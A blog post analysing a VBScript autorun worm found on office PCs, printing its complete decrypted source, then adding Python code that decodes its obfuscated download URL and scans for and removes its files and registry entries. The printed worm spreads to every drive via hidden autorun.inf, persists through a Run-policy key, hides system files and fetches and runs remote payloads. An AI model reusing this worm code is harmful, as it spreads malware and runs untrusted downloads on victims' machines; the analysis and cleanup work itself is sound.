
A simple analysis of a script virus

2008-11-29 10:35 | Submitted by: computer

Recently people in my office kept reporting that they had somehow caught a virus. I didn't pay much attention, until one of our own people caught it too, which is how today's post came about.

So, one evening a bunch of us were rushing to meet a deadline... Suddenly someone shouted: "Why is my CPU usage stuck so high?" I grabbed Process Explorer and saw that wscript.exe was constantly looking for a file called main.vbe. Why would a script be running for no reason? It had to be a virus, and probably the legendary "office virus"... Just our luck... Hehe, time to dissect it!

For this kind of script virus, our fix is to disable vbscript.dll: run "regsvr32 -u vbscript.dll", and the CPU quiets down...

Now let's open main.vbe. It sits in the root of drive C. First strip the hidden and system attributes from the script, then open it in Notepad. All gibberish! Sigh, the same old trick: the script is encrypted so the victim sees a mess, gets a headache and gives up on removing it. But to run, it has to decrypt itself! Sure enough, after all the dense garbage there is one line, execute(thistext). Isn't thistext the plaintext of the virus? Good, let's write it out! Replace execute(thistext) with:

  Dim fso, MyFile
  Set fso = CreateObject("Scripting.FileSystemObject")
  Set MyFile = fso.CreateTextFile("c:\testfile.txt", True)
  MyFile.WriteLine(thistext)
  MyFile.Close

Re-register vbscript.dll and run it! Out comes the virus in one go!

Code:

  ver="3.0"
  tile="daxian"&ver
  about="daxianbiyele 2007.7.11"
  ' download URL assembled from chr() calls so it never appears as plain text
  fromurl=chr(104)&chr(116)&chr(116)&chr(112)&"://"&chr(104)&chr(103)&"z."&chr(100)&"in"&chr(103)&chr(104)&"ui123."&chr(99)&"n/wan."&chr(97)&"s"&chr(112)
  on error resume next
  dim wsh
  dim WshShell
  Set Wsh =CreateObject("WScript.Shell")
  set WshShell=Wscript.CreateObject("Wscript.Shell")
  Set FSO = CreateObject("Scripting.FileSystemObject")
  set dir = FSO.GetSpecialFolder(1)   ' system directory
  Set dc = FSO.Drives
  ouwnname=Wscript.ScriptName
  mulu=left(Wscript.ScriptFullName,len(Wscript.ScriptFullName)-len(Wscript.ScriptName))
  ' sys=true when running from the system directory copy
  if mulu=dir&"\" then sys=true
  ' when launched from a drive root via autorun.inf, open that drive so the user sees nothing odd
  For Each d In dc
    if mulu=d&"\" then opendisk=WshShell.Run("explorer "&d,3,false)
  Next
  ' the drive-root copy exits if another wscript.exe (the resident copy) is already running
  if not sys=true then
    wscript.sleep 2000
    set y=getobject("winmgmts:\\.\root\cimv2")
    set x=y.execquery("select * from win32_process where name='wscript.exe'")
    i=0
    for each j in x
      i=i+1
    next
    if i>1 then wscript.quit
  end if
  yincang
  If fso.FileExists(mulu&"autorun.inf") Then
    if readtxt(mulu&"autorun.inf",1)<>tile then
      buildinf ver,"7+11.exe",now
    end If
  else
    buildinf ver,"7+11.exe",now
  End If
  copyexe=readtxt(mulu&"autorun.inf",7)
  randomize
  sjs=int(Rnd * (31-1+1)) + 1
  If fso.FileExists(mulu&copyexe) and Day(Date)<>sjs then
    if sys=true then WshShell.run mulu&copyexe
  Else
    ' fetch the update manifest from fromurl, one field per line
    Ldownver=readtxt(mulu&"autorun.inf",5)
    downfile mulu&"temp.txt",fromurl,0
    Set OpenFile = FSO.OpenTextFile(mulu&"temp.txt", 1)
    nouse = OpenFile.ReadLine
    downis = OpenFile.ReadLine
    downver = OpenFile.ReadLine
    downname = month(Date)&"+"&Day(Date)&".exe"
    downfrom = OpenFile.ReadLine
    vbsver = OpenFile.ReadLine
    vbsname = OpenFile.ReadLine
    vbsurl = OpenFile.ReadLine
    guanggao= OpenFile.ReadLine
    OpenFile.Close
    FSO.DeleteFile(mulu&"temp.txt")
    if downis=1 then
      If vbsver<>ver then
        downfile mulu&vbsname,vbsurl,1
        wscript.quit
      end if
      If downver<>Ldownver then
        downfile mulu&downname,downfrom,0
        buildinf downver,downname,guanggao
      end if
    end if
  End If
  copyexe=readtxt(mulu&"autorun.inf",7)
  if sys=true then
    ganran()
    WshShell.run mulu&ouwnname
  else
    ' first run from a drive root: install into the system directory and C:\, then start the resident copy
    shuxing mulu&ouwnname,2+4
    copyvbs dir&"\main.vbe"
    copyvbs dir&"\main.txt"
    CopyFile mulu&"autorun.inf",dir&"\autorun.inf"
    CopyFile mulu&copyexe,dir&"\"&copyexe
    shuxing dir&"\"&copyexe,2+4
    if mulu<>"C:\" then
      copyvbs "c:\main.vbs"
      CopyFile mulu&"autorun.inf","c:\autorun.inf"
      CopyFile mulu&copyexe,"c:\"&copyexe
    end if
    zhuce
    WshShell.run dir&"\main.vbe"
  end if

  function copyfile(file,where)
    shuxing where,0
    if fso.FileExists(file) then FSO.CopyFile file,where,True
  end function

  ' copy this script's own source to another path
  function copyvbs(where)
    shuxing where,0
    set self=fso.opentextfile(mulu&ouwnname,1)
    vbscopy=self.readall
    self.close
    set vbs = fso.CreateTextFile(where, True)
    vbs.write vbscopy
    vbs.close
    shuxing where,2+4
  end function

  ' persistence: Explorer policies Run key
  function zhuce()
    RegPath="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\run\"
    Type_Name="REG_SZ"
    Key_Name="explorer"
    Key_Data="main.vbe"
    WshShell.RegWrite RegPath&Key_Name,Key_Data,Type_Name
  end function

  ' keep "show protected operating system files" switched off
  function yincang()
    RegPath="HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\"
    Type_Name="REG_DWORD"
    Key_Name="ShowSuperHidden"
    Key_Data="00000000"
    WshShell.RegWrite RegPath&Key_Name,Key_Data,Type_Name
  end function

  ' write autorun.inf; lines 1, 5 and 7 double as the marker, exe version and exe name read back by readtxt
  function buildinf(exever,exename,adv)
    shuxing mulu&"autorun.inf",0
    set ini = fso.CreateTextFile(mulu&"autorun.inf", True)
    ini.writeline tile
    ini.writeline "[AutoRun]"
    ini.writeline about
    ini.writeline "open=WScript.exe .\main.vbs"
    ini.writeline exever
    ini.writeline "shell\open=打开(&O)"
    ini.writeline exename
    ini.writeline "shell\open\Command=WScript.exe .\main.vbs"
    ini.writeline "shell\open\Default=1"
    ini.writeline adv
    ini.close
    shuxing mulu&"autorun.inf",1+2+4
  end function

  ' return line number "line" of a text file
  function readtxt(where,line)
    Set readfile = fso.OpenTextFile(where, 1)
    i=0
    do while i<line
      i=i+1
      RLine = readfile.ReadLine
    loop
    readfile.Close
    readtxt=RLine
  end function

  ' set file attributes (1=read-only, 2=hidden, 4=system)
  function shuxing(file,change)
    if fso.FileExists(file) then
      Set oFile = FSO.GetFile(file)
      oFile.Attributes = change
      Set oFile = Nothing
    end if
  end function

  ' download urlfile to localfile via XMLHTTP + ADODB.Stream, optionally run it
  function downfile(localfile,urlfile,runfile)
    shuxing localfile,0
    iLocal = LCase(localfile):iRemote = LCase(urlfile):
    'if 1=2 then Wscript.echo "Impossible!"
    Set xPost = CreateObject("Microsoft.XMLHTTP")
    'if 1=2 then Wscript.echo "Impossible!"
    xPost.Open "get",iRemote,0
    'if 1=2 then Wscript.echo "Impossible!"
    xPost.Send()
    'if 1=2 then Wscript.echo "Impossible!"
    Set sGet = CreateObject("ADODB.Stream")
    'if 1=2 then Wscript.echo "Impossible!"
    sGet.Mode = 3
    'if 1=2 then Wscript.echo "Impossible!"
    sGet.Type = 1
    'if 1=2 then Wscript.echo "Impossible!"
    sGet.Open()
    'if 1=2 then Wscript.echo "Impossible!"
    sGet.Write(xPost.responseBody)
    'if 1=2 then Wscript.echo "Impossible!"
    sGet.SaveToFile iLocal,2
    'if 1=2 then Wscript.echo "Impossible!"
    shuxing localfile,2+4
    if runfile=1 then Wsh.run iLocal
  end function

  ' resident copy: every 2 s re-seed every fixed and removable drive (except A: and B:)
  function ganran()
    do
      For Each d In dc
        If d.DriveType = 3 or (d.DriveType = 1 and d<>"A:" and d<> "B:") Then
          If fso.FileExists(d&"\main.vbs") and fso.FileExists(d&"\autorun.inf") then
            if readtxt(d&"\autorun.inf",1)<>tile then
              CopyFile dir&"\autorun.inf",d&"\autorun.inf"
              CopyFile dir&"\"&copyexe,d&"\"&copyexe
              CopyFile dir&"\main.txt",d&"\main.vbs"
            end if
          else
            CopyFile dir&"\autorun.inf",d&"\autorun.inf"
            CopyFile dir&"\"&copyexe,d&"\"&copyexe
            CopyFile dir&"\main.txt",d&"\main.vbs"
          end if
        End If
      next
      wscript.sleep 2000
    loop
  end function

Hehe, the temporary fix is above. I haven't had time to read through this virus in full~~~ I'd ask the experts for a complete solution! Back to the grind......
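The fromurl assignment in the listing above hides the download URL by assembling it from chr() calls, so searching the file for "http" finds nothing. As an added example, not code from the original post, here is a small Python evaluator for that VBScript idiom: it understands string literals (with VBScript's doubled-quote escape), chr()/chrw() calls and & concatenation, refuses anything else rather than falling back to eval(), and reports every assignment in a script that uses chr(). The SAMPLE_SCRIPT text is constructed from the definition lines on this page; handling chrw() and escaped quotes goes slightly beyond what the page's sample needs.

```python
import re

# One token of a VBScript string expression: a "literal" (a doubled "" inside
# is an escaped quote), a chr(n)/chrw(n) call, the & operator, or whitespace.
_TOKEN = re.compile(
    r'"((?:[^"]|"")*)"'           # group 1: string literal body
    r'|chrw?\s*\(\s*(\d+)\s*\)'   # group 2: code point of chr()/chrw()
    r'|(&)'                       # group 3: concatenation
    r'|(\s+)',                    # group 4: whitespace
    re.IGNORECASE,
)
_ASSIGN = re.compile(r"^\s*(\w+)\s*=\s*(.+?)\s*$")


def decode_vbs_string(expr):
    """Evaluate an expression such as chr(104)&chr(116)&"tp" without calling eval()."""
    out, pos = [], 0
    while pos < len(expr):
        m = _TOKEN.match(expr, pos)
        if m is None:  # variable, function call, etc.: refuse rather than guess
            raise ValueError(f"unsupported VBScript at offset {pos}: {expr[pos:pos + 20]!r}")
        literal, code, _amp, _ws = m.groups()
        if literal is not None:
            out.append(literal.replace('""', '"'))
        elif code is not None:
            out.append(chr(int(code)))
        pos = m.end()
    return "".join(out)


def find_obfuscated_assignments(script):
    """Map each variable assigned from a chr()-built expression to its decoded value."""
    found = {}
    for line in script.splitlines():
        m = _ASSIGN.match(line)
        if not m or not re.search(r"chrw?\s*\(", m.group(2), re.IGNORECASE):
            continue
        try:
            found[m.group(1)] = decode_vbs_string(m.group(2))
        except ValueError:
            pass  # mixes in variables or calls; leave it for manual review
    return found


# Constructed sample: the definition lines from the listing on this page.
SAMPLE_SCRIPT = '''ver="3.0"
tile="daxian"&ver
about="daxianbiyele 2007.7.11"
fromurl=chr(104)&chr(116)&chr(116)&chr(112)&"://"&chr(104)&chr(103)&"z."&chr(100)&"in"&chr(103)&chr(104)&"ui123."&chr(99)&"n/wan."&chr(97)&"s"&chr(112)
'''

if __name__ == "__main__":
    for name, value in find_obfuscated_assignments(SAMPLE_SCRIPT).items():
        print(f"{name} = {value!r}")
```

Run against the page's listing this yields fromurl = http://hgz.dinghui123.cn/wan.asp, the address the worm polls for its update manifest (the downis/downver/vbsurl lines it reads from temp.txt), which is the string to block at the proxy and to search for in proxy logs. The tokenizer deliberately stops at anything that is not a literal, chr() or &, so a line such as tile="daxian"&ver is skipped instead of being evaluated as code.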

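The listing's own helper functions define the indicators a cleanup needs: buildinf() writes a non-standard autorun.inf whose first line is the marker "daxian"&ver and whose seventh line names the dropped executable (the same lines readtxt(...,1) and readtxt(...,7) read back), copyvbs() drops main.vbs/main.vbe/main.txt into the system directory and every drive root, zhuce() sets the policies\Explorer\run value explorer = main.vbe under HKLM, and yincang() zeroes ShowSuperHidden. The following Python scanner and cleaner is an added example built on those indicators, not the post's or the worm's code. The file-level part runs on any OS against any directory used as a stand-in for a drive root; the registry part is Windows-only and needs an elevated shell for the HKLM value. The demo tree it builds is constructed, not a real sample.

```python
import os
import shutil
import subprocess
import sys
import tempfile
from pathlib import Path

# autorun.inf layout written by the worm's buildinf(): line 1 = marker "daxian"&ver,
# line 5 = exe version, line 7 = dropped exe name (what readtxt(...,1/5/7) reads back).
MARKER_PREFIX = "daxian"
OPEN_LINE = "open=WScript.exe .\\main.vbs"
DROPPED_SCRIPTS = ("main.vbs", "main.vbe", "main.txt")  # written by copyvbs()

# Registry persistence created by zhuce() and yincang(); used by clean_registry().
REG_RUN_KEY = r"SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\run"
REG_RUN_VALUE = "explorer"            # data: main.vbe
REG_HIDDEN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"
REG_HIDDEN_VALUE = "ShowSuperHidden"  # zeroed so the hidden+system drops stay invisible


def parse_autorun(path):
    """Return (exe_version, exe_name) if autorun.inf has the worm's layout, else None."""
    try:
        lines = Path(path).read_text(encoding="utf-8", errors="replace").splitlines()
    except OSError:
        return None
    if len(lines) < 7 or not lines[0].startswith(MARKER_PREFIX):
        return None
    if lines[1].strip() != "[AutoRun]" or lines[3].strip() != OPEN_LINE:
        return None
    return lines[4].strip(), lines[6].strip()


def scan_root(root):
    """Return the worm's files present in one drive root (or a stand-in directory)."""
    root = Path(root)
    info = parse_autorun(root / "autorun.inf")
    if info is None:
        return []
    _version, exe_name = info
    names = ["autorun.inf", *DROPPED_SCRIPTS] + ([exe_name] if exe_name else [])
    return [root / n for n in names if (root / n).is_file()]


def clean_root(root):
    """Clear the hidden/system/read-only attributes set by shuxing() and delete each file."""
    removed = []
    for p in scan_root(root):
        if os.name == "nt":  # os.chmod only clears read-only on Windows; attrib clears the rest
            subprocess.run(["attrib", "-h", "-s", "-r", str(p)], check=False)
        os.chmod(p, 0o600)
        p.unlink()
        removed.append(p.name)
    return removed


def clean_registry():
    """Delete the Run-policy value and restore ShowSuperHidden. Windows only; HKLM needs admin."""
    if os.name != "nt":
        return False
    import winreg
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, REG_RUN_KEY, 0, winreg.KEY_SET_VALUE) as k:
            winreg.DeleteValue(k, REG_RUN_VALUE)
    except FileNotFoundError:
        pass  # key or value already gone
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, REG_HIDDEN_KEY, 0, winreg.KEY_SET_VALUE) as k:
        winreg.SetValueEx(k, REG_HIDDEN_VALUE, 0, winreg.REG_DWORD, 1)
    return True


def build_infected_root(root, version="3.0", exe_name="7+11.exe"):
    """Constructed fixture mirroring buildinf() and copyvbs(); not a real sample."""
    root = Path(root)
    root.mkdir(parents=True, exist_ok=True)
    inf = [MARKER_PREFIX + version, "[AutoRun]", "daxianbiyele 2007.7.11", OPEN_LINE,
           version, "shell\\open=打开(&O)", exe_name,
           "shell\\open\\Command=WScript.exe .\\main.vbs", "shell\\open\\Default=1", "adv"]
    (root / "autorun.inf").write_text("\n".join(inf) + "\n", encoding="utf-8")
    (root / "main.vbs").write_text("execute(thistext)\n")
    (root / exe_name).write_bytes(b"MZ")
    return root


def demo():
    """Scan and clean a constructed infected root next to a benign one; return the findings."""
    base = Path(tempfile.mkdtemp(prefix="daxian_demo_"))
    infected = build_infected_root(base / "E")
    benign = base / "F"
    benign.mkdir()
    (benign / "autorun.inf").write_text("[AutoRun]\nopen=setup.exe\n")  # ordinary autorun.inf
    result = {
        "infected_found": sorted(p.name for p in scan_root(infected)),
        "benign_found": [p.name for p in scan_root(benign)],
        "removed": sorted(clean_root(infected)),
        "left_after_clean": sorted(p.name for p in infected.iterdir()),
    }
    shutil.rmtree(base)
    return result


if __name__ == "__main__":
    # Usage: python clean_daxian.py C:\ E:\ C:\Windows\System32   (no args: run the demo)
    roots = sys.argv[1:]
    print(demo() if not roots else "")
    for r in roots:
        print(r, "removed:", clean_root(r))
    if roots and os.name == "nt":
        print("registry cleaned:", clean_registry())
```

Order matters: the resident copy in the system directory re-seeds every drive every two seconds (the ganran() loop), so unregister vbscript.dll or kill wscript.exe first, then pass the system directory together with every drive root, since that copy carries the same autorun.inf layout and is picked up by the same check. The marker-line test is what keeps an ordinary autorun.inf (one that starts with [AutoRun]) from being deleted.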